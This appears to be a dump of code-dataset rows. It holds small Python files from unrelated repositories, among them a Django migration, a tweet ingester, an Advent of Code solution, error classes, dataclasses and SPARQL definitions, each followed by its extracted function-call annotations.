'from io import BytesIO, StringIO\n'), ((61, 69, 61, 79), 'io.StringIO', 'StringIO', ({}, {}), '()', False, 'from io import BytesIO, StringIO\n'), ((70, 52, 70, 70), 'io.StringIO', 'StringIO', ({(70, 61, 70, 69): '"""YWJj\n"""'}, {}), "('YWJj\\n')", False, 'from io import BytesIO, StringIO\n'), ((70, 72, 70, 81), 'io.BytesIO', 'BytesIO', ({}, {}), '()', False, 'from io import BytesIO, StringIO\n'), ((71, 52, 71, 70), 'io.BytesIO', 'BytesIO', ({(71, 60, 71, 69): "b'YWJj\\n'"}, {}), "(b'YWJj\\n')", False, 'from io import BytesIO, StringIO\n'), ((71, 72, 71, 82), 'io.StringIO', 'StringIO', ({}, {}), '()', False, 'from io import BytesIO, StringIO\n'), ((72, 52, 72, 70), 'io.StringIO', 'StringIO', ({(72, 61, 72, 69): '"""YWJj\n"""'}, {}), "('YWJj\\n')", False, 'from io import BytesIO, StringIO\n'), ((72, 72, 72, 82), 'io.StringIO', 'StringIO', ({}, {}), '()', False, 'from io import BytesIO, StringIO\n'), ((79, 11, 79, 46), 'base64.b64encode', 'base64.b64encode', ({(79, 28, 79, 45): "b'www.python.org'"}, {}), "(b'www.python.org')", False, 'import base64\n'), ((80, 11, 80, 36), 'base64.b64encode', 'base64.b64encode', ({(80, 28, 80, 35): "b'\\x00'"}, {}), "(b'\\x00')", False, 'import base64\n'), ((81, 11, 81, 33), 'base64.b64encode', 'base64.b64encode', ({(81, 28, 81, 32): "b'a'"}, {}), "(b'a')", False, 'import base64\n'), ((82, 11, 82, 34), 'base64.b64encode', 'base64.b64encode', ({(82, 28, 82, 33): "b'ab'"}, {}), "(b'ab')", False, 'import base64\n'), ((83, 11, 83, 35), 'base64.b64encode', 'base64.b64encode', ({(83, 28, 83, 34): "b'abc'"}, {}), "(b'abc')", False, 'import base64\n'), ((84, 11, 84, 32), 'base64.b64encode', 'base64.b64encode', ({(84, 28, 84, 31): "b''"}, {}), "(b'')", False, 'import base64\n'), ((85, 11, 87, 62), 'base64.b64encode', 'base64.b64encode', ({(85, 28, 87, 61): "b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#0^&*();:<>,. []{}'"}, {}), "(\n b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#0^&*();:<>,. []{}'\n )", False, 'import base64\n'), ((92, 11, 92, 66), 'base64.b64encode', 'base64.b64encode', (), '', False, 'import base64\n'), ((101, 11, 101, 55), 'base64.standard_b64encode', 'base64.standard_b64encode', ({(101, 37, 101, 54): "b'www.python.org'"}, {}), "(b'www.python.org')", False, 'import base64\n'), ((102, 11, 102, 42), 'base64.standard_b64encode', 'base64.standard_b64encode', ({(102, 37, 102, 41): "b'a'"}, {}), "(b'a')", False, 'import base64\n'), ((103, 11, 103, 43), 'base64.standard_b64encode', 'base64.standard_b64encode', ({(103, 37, 103, 42): "b'ab'"}, {}), "(b'ab')", False, 'import base64\n'), ((104, 11, 104, 44), 'base64.standard_b64encode', 'base64.standard_b64encode', ({(104, 37, 104, 43): "b'abc'"}, {}), "(b'abc')", False, 'import base64\n'), ((105, 11, 105, 41), 'base64.standard_b64encode', 'base64.standard_b64encode', ({(105, 37, 105, 40): "b''"}, {}), "(b'')", False, 'import base64\n'), ((106, 11, 108, 71), 'base64.standard_b64encode', 'base64.standard_b64encode', ({(106, 37, 108, 70): "b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#0^&*();:<>,. []{}'"}, {}), "(\n b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#0^&*();:<>,. []{}'\n )", False, 'import base64\n'), ((117, 11, 117, 58), 'base64.urlsafe_b64encode', 'base64.urlsafe_b64encode', ({(117, 36, 117, 57): "b'\\xd3V\\xbeo\\xf7\\x1d'"}, {}), "(b'\\xd3V\\xbeo\\xf7\\x1d')", False, 'import base64\n'), ((200, 11, 200, 32), 'base64.b32encode', 'base64.b32encode', ({(200, 28, 200, 31): "b''"}, {}), "(b'')", False, 'import base64\n'), ((201, 11, 201, 36), 'base64.b32encode', 'base64.b32encode', ({(201, 28, 201, 35): "b'\\x00'"}, {}), "(b'\\x00')", False, 'import base64\n'), ((202, 11, 202, 33), 'base64.b32encode', 'base64.b32encode', ({(202, 28, 202, 32): "b'a'"}, {}), "(b'a')", False, 'import base64\n'), ((203, 11, 203, 34), 'base64.b32encode', 'base64.b32encode', ({(203, 28, 203, 33): "b'ab'"}, {}), "(b'ab')", False, 'import base64\n'), ((204, 11, 204, 35), 'base64.b32encode', 'base64.b32encode', ({(204, 28, 204, 34): "b'abc'"}, {}), "(b'abc')", False, 'import base64\n'), ((205, 11, 205, 36), 'base64.b32encode', 'base64.b32encode', ({(205, 28, 205, 35): "b'abcd'"}, {}), "(b'abcd')", False, 'import base64\n'), ((206, 11, 206, 37), 'base64.b32encode', 'base64.b32encode', ({(206, 28, 206, 36): "b'abcde'"}, {}), "(b'abcde')", False, 'import base64\n'), ((251, 11, 251, 40), 'base64.b32decode', 'base64.b32decode', ({(251, 28, 251, 39): "b'MLO23456'"}, {}), "(b'MLO23456')", False, 'import base64\n'), ((252, 11, 252, 39), 'base64.b32decode', 'base64.b32decode', ({(252, 28, 252, 38): '"""MLO23456"""'}, {}), "('MLO23456')", False, 'import base64\n'), ((277, 11, 277, 52), 'base64.b16encode', 'base64.b16encode', ({(277, 28, 277, 51): "b'\\x01\\x02\\xab\\xcd\\xef'"}, {}), "(b'\\x01\\x02\\xab\\xcd\\xef')", False, 'import base64\n'), ((278, 11, 278, 36), 'base64.b16encode', 'base64.b16encode', ({(278, 28, 278, 35): "b'\\x00'"}, {}), "(b'\\x00')", False, 'import base64\n'), ((285, 11, 285, 42), 'base64.b16decode', 'base64.b16decode', ({(285, 28, 285, 41): "b'0102ABCDEF'"}, {}), "(b'0102ABCDEF')", False, 'import base64\n'), ((286, 11, 286, 41), 'base64.b16decode', 'base64.b16decode', ({(286, 28, 286, 40): '"""0102ABCDEF"""'}, {}), "('0102ABCDEF')", False, 'import base64\n'), ((287, 11, 287, 34), 'base64.b16decode', 'base64.b16decode', ({(287, 28, 287, 33): "b'00'"}, {}), "(b'00')", False, 'import base64\n'), ((288, 11, 288, 33), 'base64.b16decode', 'base64.b16decode', ({(288, 28, 288, 32): '"""00"""'}, {}), "('00')", False, 'import base64\n'), ((293, 11, 293, 48), 'base64.b16decode', 'base64.b16decode', ({(293, 28, 293, 41): "b'0102abcdef'", (293, 43, 293, 47): '(True)'}, {}), "(b'0102abcdef', True)", False, 'import base64\n'), ((294, 11, 294, 47), 'base64.b16decode', 'base64.b16decode', ({(294, 28, 294, 40): '"""0102abcdef"""', (294, 42, 294, 46): '(True)'}, {}), "('0102abcdef', True)", False, 'import base64\n'), ((315, 12, 315, 37), 'os.unlink', 'os.unlink', ({(315, 22, 315, 36): 'support.TESTFN'}, {}), '(support.TESTFN)', False, 'import os\n'), ((141, 15, 141, 37), 'base64.b64decode', 'base64.b64decode', ({(141, 32, 141, 36): 'data'}, {}), '(data)', False, 'import base64\n'), ((153, 15, 153, 56), 'base64.b64decode', 'base64.b64decode', (), '', False, 'import base64\n'), ((154, 15, 154, 60), 'base64.b64decode', 'base64.b64decode', (), '', False, 'import base64\n'), ((155, 15, 155, 60), 'base64.b64decode', 'base64.b64decode', (), '', False, 'import base64\n'), ((156, 15, 156, 64), 'base64.b64decode', 'base64.b64decode', (), '', False, 'import base64\n'), ((160, 15, 160, 46), 'base64.standard_b64decode', 'base64.standard_b64decode', ({(160, 41, 160, 45): 'data'}, {}), '(data)', False, 'import base64\n'), ((170, 15, 170, 45), 'base64.urlsafe_b64decode', 'base64.urlsafe_b64decode', ({(170, 40, 170, 44): 'data'}, {}), '(data)', False, 'import base64\n'), ((191, 29, 191, 51), 'base64.b64decode', 'base64.b64decode', ({(191, 46, 191, 50): 'bstr'}, {}), '(bstr)', False, 'import base64\n'), ((194, 16, 194, 53), 'base64.b64decode', 'base64.b64decode', (), '', False, 'import base64\n'), ((222, 15, 222, 37), 'base64.b32decode', 'base64.b32decode', ({(222, 32, 222, 36): 'data'}, {}), '(data)', False, 'import base64\n'), ((244, 15, 244, 43), 'base64.b32decode', 'base64.b32decode', ({(244, 32, 244, 36): 'data', (244, 38, 244, 42): '(True)'}, {}), '(data, True)', False, 'import base64\n'), ((261, 15, 261, 50), 'base64.b32decode', 'base64.b32decode', (), '', False, 'import base64\n'), ((262, 15, 262, 54), 'base64.b32decode', 'base64.b32decode', (), '', False, 'import base64\n'), ((263, 15, 263, 54), 'base64.b32decode', 'base64.b32decode', (), '', False, 'import base64\n'), ((264, 15, 264, 58), 'base64.b32decode', 'base64.b32decode', (), '', False, 'import base64\n'), ((271, 16, 271, 38), 'base64.b32decode', 'base64.b32decode', ({(271, 33, 271, 37): 'data'}, {}), '(data)', False, 'import base64\n')] |
ChameleonCloud/portal | appliance_catalog/migrations/0015_appliance_icon_py3.py | 92a06fb926dc36e997b94fb8dcd22b7e0d24d3ee | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-02-25 20:32
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
"""Updates ImageField syntax for later version.
"""
dependencies = [
('appliance_catalog', '0014_auto_20180625_1104'),
]
operations = [
migrations.AlterField(
model_name='appliance',
name='appliance_icon',
field=models.ImageField(blank=True, upload_to='appliance_catalog/icons/'),
),
]
| [((20, 18, 20, 85), 'django.db.models.ImageField', 'models.ImageField', (), '', False, 'from django.db import migrations, models\n')] |
ChristopherKchilton/twitoff-ChristopherKchilton | twitoff/twitter.py | fbac9899feff256ededab009b28e2f6ebd67f476 | """Retrieve and request tweets from the DS API"""
import requests
import spacy
from .models import DB, Tweet, User
nlp = spacy.load("my_model")
def vectorize_tweet(tweet_text):
return nlp(tweet_text).vector
# Add and updates tweets
def add_or_update_user(username):
"""Adds and updates the user with twiter handle 'username'
to our database
"""
#TODO: Figure out
try:
r = requests.get(
f"https://lambda-ds-twit-assist.herokuapp.com/user/{username}")
user = r.json()
user_id = user["twitter_handle"]["id"]
# print(user)
# This is either respectively grabs or creates a user for our db
db_user = (User.query.get(user_id)) or User(id=user_id, name=username)
# This adds the db_user to our database
DB.session.add(db_user)
tweets = user["tweets"]
# if tweets:
# db_user.newest_tweet_id = tweets[0].id
for tweet in tweets:
tweet_vector = vectorize_tweet(tweet["full_text"])
tweet_id = tweet["id"]
db_tweet = (Tweet.query.get(tweet_id)) or Tweet(
id=tweet["id"], text=tweet["full_text"], vect=tweet_vector)
db_user.tweets.append(db_tweet)
DB.session.add(db_tweet)
except Exception as e:
print("Error processing {}: {}".format(username, e))
raise e
else:
DB.session.commit()
| [((7, 6, 7, 28), 'spacy.load', 'spacy.load', ({(7, 17, 7, 27): '"""my_model"""'}, {}), "('my_model')", False, 'import spacy\n'), ((20, 12, 21, 75), 'requests.get', 'requests.get', ({(21, 12, 21, 74): 'f"""https://lambda-ds-twit-assist.herokuapp.com/user/{username}"""'}, {}), "(f'https://lambda-ds-twit-assist.herokuapp.com/user/{username}')", False, 'import requests\n')] |
p88h/aoc2017 | day22.py | a929a8c0894559b0d7dd3d0b58c076295087f4c8 | import io
grid = {}
y = 0
x = 0
for l in io.open("day22.in").read().splitlines():
for x in range(len(l)):
grid[(y,x)] = l[x]
y += 1
y = y // 2
x = x // 2
dx = 0
dy = -1
r = 0
for iter in range(10000000):
if (y,x) not in grid or grid[(y,x)] == '.':
(dy, dx) = (-dx, dy)
grid[(y,x)] = 'W'
elif grid[(y,x)] == 'W':
grid[(y,x)] = '#'
r += 1
elif grid[(y,x)] == '#':
(dy, dx) = (dx, -dy)
grid[(y,x)] = 'F'
elif grid[(y,x)] == 'F':
(dy, dx) = (-dy, -dx)
grid[(y,x)] = '.'
y += dy
x += dx
print(r) | [((6, 9, 6, 28), 'io.open', 'io.open', ({(6, 17, 6, 27): '"""day22.in"""'}, {}), "('day22.in')", False, 'import io\n')] |
TheGoldfish01/pydpf-core | ansys/dpf/core/errors.py | 75ca8a180454f94cedafbc68c1d6f20dcfc4c795 | from grpc._channel import _InactiveRpcError, _MultiThreadedRendezvous
from functools import wraps
_COMPLEX_PLOTTING_ERROR_MSG = """
Complex fields cannot be plotted. Use operators to get the amplitude
or the result at a defined sweeping phase before plotting.
"""
_FIELD_CONTAINER_PLOTTING_MSG = """"
This fields_container contains multiple fields. Only one time-step
result can be plotted at a time. Extract a field with
``fields_container[index]``.
"""
class DpfVersionNotSupported(RuntimeError):
"""Error raised when the dpf-core/grpc-dpf python features are not
supported by the DPF gRPC server version."""
def __init__(self, version, msg=None):
if msg is None:
msg = "Feature not supported. Upgrade the server to "
msg += str(version)
msg += " version (or above)."
RuntimeError.__init__(self, msg)
class DpfValueError(ValueError):
"""Error raised when a specific DPF error value must be defined."""
def __init__(
self, msg="A value that has been set leads to incorrect DPF behavior."
):
ValueError.__init__(self, msg)
class InvalidTypeError(ValueError):
"""Error raised when a parameter has the wrong type."""
def __init__(self, data_type, parameter_name):
msg = (
"A "
+ data_type
+ " must be used for the following parameter: "
+ parameter_name
+ "."
)
ValueError.__init__(self, msg)
class LocationError(ValueError):
"""Error raised when using an invalid location."""
def __init__(self, msg="Invalid location"):
ValueError.__init__(self, msg)
class ComplexPlottingError(ValueError):
"""Error raised when attempting to plot a field with complex data."""
def __init__(self, msg=_COMPLEX_PLOTTING_ERROR_MSG):
ValueError.__init__(self, msg)
class FieldContainerPlottingError(ValueError):
"""Error raised when attempting to plot a fields_container containing
multiple fields."""
def __init__(self, msg=_FIELD_CONTAINER_PLOTTING_MSG):
ValueError.__init__(self, msg)
class InvalidANSYSVersionError(RuntimeError):
"""Error raised when the Ansys verion is invalid."""
def __init__(self, msg=""):
RuntimeError.__init__(self, msg)
class DPFServerException(Exception):
"""Error raised when the DPF server has encountered an error."""
def __init__(self, msg=""):
Exception.__init__(self, msg)
class DPFServerNullObject(Exception):
"""Error raised when the DPF server cannot find an object."""
def __init__(self, msg=""):
Exception.__init__(self, msg)
class InvalidPortError(OSError):
"""Error raised when used an invalid port when starting DPF."""
def __init__(self, msg=""):
OSError.__init__(self, msg)
def protect_grpc(func):
"""Capture gRPC exceptions and return a more succinct error message."""
@wraps(func)
def wrapper(*args, **kwargs):
"""Capture gRPC exceptions."""
# Capture gRPC exceptions
try:
out = func(*args, **kwargs)
except (_InactiveRpcError, _MultiThreadedRendezvous) as error:
details = error.details()
if "object is null in the dataBase" in details:
raise DPFServerNullObject(details) from None
raise DPFServerException(details) from None
return out
return wrapper
| [((104, 5, 104, 16), 'functools.wraps', 'wraps', ({(104, 11, 104, 15): 'func'}, {}), '(func)', False, 'from functools import wraps\n')] |
yu961549745/pynote | ls10.py | 5976aeeca6368c0956baddf6a9ccb93ae8e0612a | '''
IO
'''
| [] |
askender/deep_disfluency | deep_disfluency/feature_extraction/wer_calculation_from_final_asr_results.py | bea8403ed954df8eadd3e2b9d98bb7c2b416a665 | from mumodo.mumodoIO import open_intervalframe_from_textgrid
import numpy
from deep_disfluency.utils.accuracy import wer
final_file = open('wer_test.text', "w")
ranges1 = [line.strip() for line in open(
"/media/data/jh/simple_rnn_disf/rnn_disf_detection/data/disfluency_detection/swda_divisions_disfluency_detection/SWDisfHeldoutASR_ranges.text")]
ranges2 = [line.strip() for line in open(
"/media/data/jh/simple_rnn_disf/rnn_disf_detection/data/disfluency_detection/swda_divisions_disfluency_detection/SWDisfTestASR_ranges.text")]
for ranges in [ranges1, ranges2]:
final_file.write("\n\n")
for r in ranges:
for s in ["A", "B"]:
iframe = open_intervalframe_from_textgrid("{0}{1}.TextGrid"
.format(r, s))
hyp = " ".join(iframe['Hyp']['text'])
ref = " ".join(iframe['Ref']['text'])
wer = wer(ref, hyp)
cost = wer(ref, hyp, macro=True)
print r, s, wer
print>>final_file, r, s, wer, cost
final_file.close()
# Based on the results, output the 'good' ASR results
results = open("wer_test.text")
no_ho = 0
no_test = 0
ingood = True
file = open("../../../simple_rnn_disf/rnn_disf_detection/data/disfluency_detection/swda_divisions_disfluency_detection/SWDisfHeldoutASRgood_ranges.text", "w")
for l in results:
# print l
if l == "\n":
print no_ho
no_ho = 0
file.close()
file = open(
"../../../simple_rnn_disf/rnn_disf_detection/data/disfluency_detection/swda_divisions_disfluency_detection/SWDisfTestASRgood_ranges.text",
"w")
continue
if float(l.strip('\n').split(" ")[
2]) < 0.4: # both speakers are under 40% error rate- likely half decent separation
# print l
if ingood and "B" in l.strip("\n").split(" ")[1]:
no_ho += 1
#file.write(l.strip('\n').split(" ")[0]+l.strip('\n').split(" ")[1]+"\n")
file.write(l.strip('\n').split(" ")[0] + "\n")
ingood = True
else:
ingood = False
print no_ho
results.close()
file.close()
| [] |
Adwaith-Rajesh/newsweec | newsweec/utils/_dataclasses.py | f3b66fb6f74cb68be4e716269032db340abe8320 | from dataclasses import dataclass
from dataclasses import field
from time import time
from typing import Any
from typing import Callable
from typing import Dict
from typing import List
from typing import Optional
from typing import Tuple
@dataclass
class NewUser:
"""Deals with the commands the user is currently sending"""
user_id: int
chat_id: int
command: str
def __repr__(self) -> str:
return f"{self.user_id=} {self.command=}"
@dataclass
class UserCommand:
"""Stores the latest command sent by the user"""
user_id: int
command: str
insert_time: int = int(time()) # for garbage collection
def __repr__(self) -> str:
return f"{self.user_id=} {self.command=} {self.insert_time=}"
@dataclass
class MessageInfo:
"""Important things in the message"""
user_id: int
chat_id: int
message_id: int
text: str
def __repr__(self) -> str:
return f"{self.user_id=} {self.chat_id=} {self.message_id=} {self.text=}"
@dataclass
class UserDBInfo:
"""Info about the user from the DB"""
feed: bool # if false, the bot will not send any news feeds on a daily basis
user_id: int
db_id: int
topics: List[str] = field(default_factory=lambda: [])
def __repr__(self) -> str:
return f"{self.user_id=} {self.feed=} {self.db_id=} {self.topics=}"
@dataclass
class StagedFunction:
"""For FunctionStagingArea"""
fn: Callable[..., Any]
args: Optional[Tuple[Any, ...]] = None
kwargs: Optional[Dict[str, Any]] = None
| [((56, 24, 56, 57), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import field\n'), ((31, 27, 31, 33), 'time.time', 'time', ({}, {}), '()', False, 'from time import time\n')] |
gwu-libraries/vivo2notld | vivo2notld/definitions/person_definition.py | 3f579f8aad28c60119864757e1fe66c2d64a0149 | from .document_summary import definition as document_summary_definition
from .organization_summary import definition as organization_summmary_definition
definition = {
"where": "?subj a foaf:Person .",
"fields": {
"name": {
"where": "?subj rdfs:label ?obj ."
},
#Contact info
"email": {
"where": """
?subj obo:ARG_2000028 ?vc .
?vc a vcard:Kind .
?vc vcard:hasEmail ?vce .
?vce a vcard:Email, vcard:Work .
?vce vcard:email ?obj .
"""
},
"telephone": {
"where": """
?subj obo:ARG_2000028 ?vc .
?vc a vcard:Kind .
?vc vcard:hasTelephone ?vct .
?vct a vcard:Telephone .
?vct vcard:telephone ?obj .
"""
},
"address": {
"where": """
?subj obo:ARG_2000028 ?vc .
?vc a vcard:Kind .
?vc vcard:hasAddress ?obj .
""",
"definition": {
"where": "?subj a vcard:Address .",
"fields": {
"address": {
"where": "?subj vcard:streetAddress ?obj ."
},
"city": {
"where": "?subj vcard:locality ?obj ."
},
"state": {
"where": "?subj vcard:region ?obj ."
},
"zip": {
"where": "?subj vcard:postalCode ?obj ."
}
}
}
},
"website": {
"list": True,
"where": """
?subj obo:ARG_2000028 ?vc .
?vc a vcard:Kind .
?vc vcard:hasURL ?vcu .
?vcu a vcard:URL .
?vcu vcard:url ?obj .
""",
"optional": True
},
"researchArea": {
"where": """
?subj vivo:hasResearchArea ?ra .
?ra rdfs:label ?obj .
""",
"optional": True,
"list": True
},
"geographicFocus": {
"where": """
?subj vivo:geographicFocus ?gf .
?gf rdfs:label ?obj .
""",
"optional": True,
"list": True
},
"overview": {
"where": "?subj vivo:overview ?obj .",
"optional": True,
},
"positions": {
"where": "?subj vivo:relatedBy ?obj .",
"definition": {
"where": "?subj a vivo:Position .",
"fields": {
"title": {
"where": "?subj rdfs:label ?obj ."
},
"organization": {
"where": "?subj vivo:relates ?obj .",
"definition": organization_summmary_definition
}
}
},
"optional": True,
"list": True
},
"publications": {
"where": """
?subj vivo:relatedBy ?aship .
?aship a vivo:Authorship .
?aship vivo:relates ?obj .
""",
"definition": document_summary_definition,
"optional": True,
"list": True
}
}
}
| [] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.